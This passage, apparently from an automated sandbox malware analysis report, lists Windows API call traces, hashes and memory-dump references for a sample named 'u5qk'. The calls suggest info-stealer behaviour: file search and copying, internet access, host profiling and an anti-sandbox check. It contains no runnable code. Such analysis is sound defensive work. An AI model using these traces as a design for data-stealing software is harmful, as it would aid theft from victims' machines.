                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?,00000000,?,0406DD00,?,0041D8AC,?,00000000,?,0041D8B0,?,00000000,0041D6E3), ref: 004137DA
                                                                                                                                                                                                                                      • ExitProcess.KERNEL32 ref: 004137E2
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_u5qk.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 941982115-0
                                                                                                                                                                                                                                      • Opcode ID: b72d18ed1bdfc85c434ab68d1be83dc3fedaf905ff30e20f0e2c3bf58e55dee1
                                                                                                                                                                                                                                      • Instruction ID: 00ad45554361a1bf9ffb836df5d455c5d00fe00f471bf70531fad30136aebd8c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b72d18ed1bdfc85c434ab68d1be83dc3fedaf905ff30e20f0e2c3bf58e55dee1
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5FF054B0944206AAE720AFA1DD05BFE7675BB08B46F10851AF612951C0DBB856818A5D
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_u5qk.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: Pi@
                                                                                                                                                                                                                                      • API String ID: 0-1360946908
                                                                                                                                                                                                                                      • Opcode ID: 8cfa37973c56b3597612bf0eabde1d0c10c792fef38bbd1cab651f123bbbde38
                                                                                                                                                                                                                                      • Instruction ID: 3e1b1374d11ee30af11b8018be346ecc1401931fa3badc01db0dac5c56ce0c6a
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8cfa37973c56b3597612bf0eabde1d0c10c792fef38bbd1cab651f123bbbde38
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 756105B5D00208DBDB14DF94D984BEEB7B0AB48304F1185AAE80677380D739AEA5DF95
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00414FF0: malloc.MSVCRT ref: 00414FF8
                                                                                                                                                                                                                                      • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004044F6
                                                                                                                                                                                                                                      • InternetCrackUrlA.WININET(00000000,00000000), ref: 00404506
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_u5qk.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CrackInternetlstrlenmalloc
                                                                                                                                                                                                                                      • String ID: <
                                                                                                                                                                                                                                      • API String ID: 3848002758-4251816714
                                                                                                                                                                                                                                      • Opcode ID: 37ed0ca631367af82f36f63dd07d4b086523e6c9a941f75142a47ca63166a19e
                                                                                                                                                                                                                                      • Instruction ID: 4ed07355fbd84ea2b0e25782c0c6f45789bb77a73037a8222357df496ca5bcbd
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 37ed0ca631367af82f36f63dd07d4b086523e6c9a941f75142a47ca63166a19e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 52216DB1D00208ABDF10EFA5E845BDD7B74AB44324F008229FA25B72C0EB346A46CB95
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(00000000,040709D8), ref: 0040EFCE
                                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(00000000,040706D8), ref: 0040F06F
                                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(00000000,04070708), ref: 0040F17E
                                                                                                                                                                                                                                        • Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_u5qk.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: lstrcpy
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3722407311-0
                                                                                                                                                                                                                                      • Opcode ID: 31078a274c7ecb916f7a8f6683db220afe1a3ed558bf997ca1166e5725c4bf32
                                                                                                                                                                                                                                      • Instruction ID: 4355cab003f180362ea4467312be264c8b2230b95154913c46dc9b5fce20c885
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 31078a274c7ecb916f7a8f6683db220afe1a3ed558bf997ca1166e5725c4bf32
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8D719871B002099BCF08FF75D9929EEB77AAF94304B10852EF4099B285EA34DE45CBC5
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(00000000,040709D8), ref: 0040EFCE
                                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(00000000,040706D8), ref: 0040F06F
                                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(00000000,04070708), ref: 0040F17E
                                                                                                                                                                                                                                        • Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_u5qk.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: lstrcpy
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3722407311-0
                                                                                                                                                                                                                                      • Opcode ID: 572c9ad16ab8822ac46bcb40876d0a65d15739239fcb8d820afb305b4ebff93d
                                                                                                                                                                                                                                      • Instruction ID: f0c51ec5e8e6f52f2f367cc82315d09f99f950b48122d5325302ee48485a66a2
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 572c9ad16ab8822ac46bcb40876d0a65d15739239fcb8d820afb305b4ebff93d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 03618A71B002099FCF08EF75D9929EEB77AAF94304B10852EF4099B295DA34EE45CBC4
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 004154E0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 0041550B
                                                                                                                                                                                                                                      • lstrcat.KERNEL32(?,00000000), ref: 0041281A
                                                                                                                                                                                                                                      • lstrcat.KERNEL32(?,04077370), ref: 00412838
                                                                                                                                                                                                                                        • Part of subcall function 00412570: wsprintfA.USER32 ref: 00412589
                                                                                                                                                                                                                                        • Part of subcall function 00412570: FindFirstFileA.KERNEL32(?,?), ref: 004125A0
                                                                                                                                                                                                                                        • Part of subcall function 00412570: StrCmpCA.SHLWAPI(?,0041D864), ref: 004125CE
                                                                                                                                                                                                                                        • Part of subcall function 00412570: StrCmpCA.SHLWAPI(?,0041D868), ref: 004125E4
                                                                                                                                                                                                                                        • Part of subcall function 00412570: FindNextFileA.KERNEL32(000000FF,?), ref: 004127B9
                                                                                                                                                                                                                                        • Part of subcall function 00412570: FindClose.KERNEL32(000000FF), ref: 004127CE
                                                                                                                                                                                                                                        • Part of subcall function 00412570: wsprintfA.USER32 ref: 0041260A
                                                                                                                                                                                                                                        • Part of subcall function 00412570: StrCmpCA.SHLWAPI(?,0041D4B2), ref: 0041261C
                                                                                                                                                                                                                                        • Part of subcall function 00412570: wsprintfA.USER32 ref: 00412639
                                                                                                                                                                                                                                        • Part of subcall function 00412570: PathMatchSpecA.SHLWAPI(?,?), ref: 0041266F
                                                                                                                                                                                                                                        • Part of subcall function 00412570: lstrcat.KERNEL32(?,04070798), ref: 0041269B
                                                                                                                                                                                                                                        • Part of subcall function 00412570: lstrcat.KERNEL32(?,0041D880), ref: 004126AD
                                                                                                                                                                                                                                        • Part of subcall function 00412570: lstrcat.KERNEL32(?,?), ref: 004126BE
                                                                                                                                                                                                                                        • Part of subcall function 00412570: lstrcat.KERNEL32(?,0041D884), ref: 004126D0
                                                                                                                                                                                                                                        • Part of subcall function 00412570: lstrcat.KERNEL32(?,?), ref: 004126E4
                                                                                                                                                                                                                                        • Part of subcall function 00412570: CopyFileA.KERNEL32(?,?,00000001), ref: 004126FA
                                                                                                                                                                                                                                        • Part of subcall function 00412570: DeleteFileA.KERNEL32(?), ref: 00412779
                                                                                                                                                                                                                                        • Part of subcall function 00412570: wsprintfA.USER32 ref: 0041265B
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_u5qk.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: lstrcat$Filewsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                                                                                                                                                                                                                      • String ID: 00A
                                                                                                                                                                                                                                      • API String ID: 2104210347-95910775
                                                                                                                                                                                                                                      • Opcode ID: c2aab32bc768535aa461f5625e9143b12642d6fe0ed55be40c744e8f67642cc8
                                                                                                                                                                                                                                      • Instruction ID: 9a839e9be304faf39bc4facc08b08f26c4420ed68fa3aa933a56f5c5bfc0aac5
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c2aab32bc768535aa461f5625e9143b12642d6fe0ed55be40c744e8f67642cc8
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6441ABB7A001047BCB24FBE0DC92EEA377E9B94705F00424DB55987191ED74A7D48BD9
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • ?Startup@TimeStamp@mozilla@@SAXXZ.MOZGLUE ref: 6BA53095
                                                                                                                                                                                                                                        • Part of subcall function 6BA535A0: InitializeCriticalSectionAndSpinCount.KERNEL32(6BADF688,00001000), ref: 6BA535D5
                                                                                                                                                                                                                                        • Part of subcall function 6BA535A0: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6BA535E0
                                                                                                                                                                                                                                        • Part of subcall function 6BA535A0: QueryPerformanceFrequency.KERNEL32(?), ref: 6BA535FD
                                                                                                                                                                                                                                        • Part of subcall function 6BA535A0: _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6BA5363F
                                                                                                                                                                                                                                        • Part of subcall function 6BA535A0: GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6BA5369F
                                                                                                                                                                                                                                        • Part of subcall function 6BA535A0: __aulldiv.LIBCMT ref: 6BA536E4
                                                                                                                                                                                                                                      • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6BA5309F
                                                                                                                                                                                                                                        • Part of subcall function 6BA75B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6BA756EE,?,00000001), ref: 6BA75B85
                                                                                                                                                                                                                                        • Part of subcall function 6BA75B50: EnterCriticalSection.KERNEL32(6BADF688,?,?,?,6BA756EE,?,00000001), ref: 6BA75B90
                                                                                                                                                                                                                                        • Part of subcall function 6BA75B50: LeaveCriticalSection.KERNEL32(6BADF688,?,?,?,6BA756EE,?,00000001), ref: 6BA75BD8
                                                                                                                                                                                                                                        • Part of subcall function 6BA75B50: GetTickCount64.KERNEL32 ref: 6BA75BE4
                                                                                                                                                                                                                                      • ?InitializeUptime@mozilla@@YAXXZ.MOZGLUE ref: 6BA530BE
                                                                                                                                                                                                                                        • Part of subcall function 6BA530F0: QueryUnbiasedInterruptTime.KERNEL32 ref: 6BA53127
                                                                                                                                                                                                                                        • Part of subcall function 6BA530F0: __aulldiv.LIBCMT ref: 6BA53140
                                                                                                                                                                                                                                        • Part of subcall function 6BA8AB2A: __onexit.LIBCMT ref: 6BA8AB30
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Time$CriticalQuerySection$InitializePerformanceStamp@mozilla@@__aulldiv$AdjustmentCountCount64CounterEnterFrequencyInterruptLeaveNow@SpinStartup@SystemTickUnbiasedUptime@mozilla@@V12@___onexit_strnicmpgetenv
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 4291168024-0
                                                                                                                                                                                                                                      • Opcode ID: 20fb90b60164e07d56b49047095b419f0d82d96fec992b0c67b3f53a19a8a4db
                                                                                                                                                                                                                                      • Instruction ID: 92f9ddc31fd03bedf97b863c22545330468ada9219469f7ed8066a1bf3214799
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 20fb90b60164e07d56b49047095b419f0d82d96fec992b0c67b3f53a19a8a4db
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0BF0D632C2878896CE10DF7489421A7B3A4EFEB114B54932DE89552561FB31A2D58391
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • OpenProcess.KERNEL32(00000410,00000000,?), ref: 00415B84
                                                                                                                                                                                                                                      • K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00415BA5
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00415BAF
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_u5qk.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CloseFileHandleModuleNameOpenProcess
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3183270410-0
                                                                                                                                                                                                                                      • Opcode ID: 97fc9d568dab5260ce1fa1a51ba1ebaf2853d767a04b83f08cd6b5726440208b
                                                                                                                                                                                                                                      • Instruction ID: b12b055c0fde6327b7bfc42128d307bcca402a5100f46dd347d8d84938e244fe
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 97fc9d568dab5260ce1fa1a51ba1ebaf2853d767a04b83f08cd6b5726440208b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C5F05475A0010CFBDB14DFA4DC4AFED7778BB08300F004499BA0597280D6B06E85CB94
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000104,004136EB,0041D6E3), ref: 0041440D
                                                                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000), ref: 00414414
                                                                                                                                                                                                                                      • GetComputerNameA.KERNEL32(?,00000104), ref: 0041442C
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_u5qk.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Heap$AllocComputerNameProcess
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 4203777966-0
                                                                                                                                                                                                                                      • Opcode ID: 6e220fa814439a9a47cb0e7b1b891ce31241d7c627682025937d03601ca1af04
                                                                                                                                                                                                                                      • Instruction ID: 2ac30a00ccf60c4f43266989ac8565747831d88261cb92d9c694311de33eed43
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6e220fa814439a9a47cb0e7b1b891ce31241d7c627682025937d03601ca1af04
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F1E0D8B0A00608FBCB20DFE4DD48BDD77BCAB04305F100055FA05D3240D7749A458B96
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,004136DC), ref: 004010EB
                                                                                                                                                                                                                                      • VirtualAllocExNuma.KERNEL32(00000000,?,?,004136DC), ref: 004010F2
                                                                                                                                                                                                                                      • ExitProcess.KERNEL32 ref: 00401103
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_u5qk.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Process$AllocCurrentExitNumaVirtual
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1103761159-0
                                                                                                                                                                                                                                      • Opcode ID: b1c8d233814077f36e701fc9dcba40fcf29c53b912e4e1fc8df77dce1fb5e496
                                                                                                                                                                                                                                      • Instruction ID: b86936f0f7b92ad6105a5e8d9325c57b614f4cde8fc05540e07f2d0ff83aec39
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b1c8d233814077f36e701fc9dcba40fcf29c53b912e4e1fc8df77dce1fb5e496
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1BE0867098570CBBE7309BA0DD0AB1976689B08B06F101055F7097A1D0C6B425008699
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • strtok_s.MSVCRT ref: 004119C8
                                                                                                                                                                                                                                        • Part of subcall function 00411650: wsprintfA.USER32 ref: 00411669
                                                                                                                                                                                                                                        • Part of subcall function 00411650: FindFirstFileA.KERNEL32(?,?), ref: 00411680
                                                                                                                                                                                                                                      • strtok_s.MSVCRT ref: 00411A4D
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_u5qk.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: strtok_s$FileFindFirstwsprintf
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3409980764-0
                                                                                                                                                                                                                                      • Opcode ID: 975833a798ef07385fb740c26f6e35f7306421425023d288693ea324a83a39c3
                                                                                                                                                                                                                                      • Instruction ID: 5fc3070f54b5ba386e916c7c3ae22cc6ad81f817c7a7f871d2ab45b9afc63085
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 975833a798ef07385fb740c26f6e35f7306421425023d288693ea324a83a39c3
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 19215471900108EBCB14FFA5CC55FED7B79AF44345F10805AF51A97151EB386B84CB99
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                        • Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,0406DD00,?,0041D8AC,?,00000000), ref: 00416E2B
                                                                                                                                                                                                                                        • Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85
                                                                                                                                                                                                                                      • lstrlen.KERNEL32(00000000,00000000,0041D599,?,?,?,?,?,?,00412FF8,?), ref: 00412B5A
                                                                                                                                                                                                                                        • Part of subcall function 00404DC0: lstrlen.KERNEL32(00000000), ref: 00404E4A
                                                                                                                                                                                                                                        • Part of subcall function 00404DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
                                                                                                                                                                                                                                        • Part of subcall function 00404DC0: StrCmpCA.SHLWAPI(?,04070728), ref: 00404ED9
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_u5qk.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
